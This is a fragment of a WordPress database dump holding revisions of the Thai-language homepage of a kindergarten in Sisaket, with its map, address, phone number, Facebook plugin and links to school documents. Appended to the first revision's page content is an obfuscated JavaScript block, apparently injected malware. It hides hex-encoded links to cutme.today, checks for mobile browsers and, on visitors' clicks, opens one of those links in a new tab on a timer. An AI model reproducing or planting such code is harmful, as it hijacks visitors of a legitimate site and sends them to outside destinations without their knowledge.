src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-28 09:51:40','2024-08-28 02:51:40','',19,'http://watprato.ssk.in.th/?p=239',0,'revision','',0),
(240,2,'2024-08-28 09:53:49','2024-08-28 02:53:49','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1u06_5GP1uT_R9axW6_ASul5adIiVXpDR/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1u06_5GP1uT_R9axW6_ASul5adIiVXpDR/view?usp=sharing\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 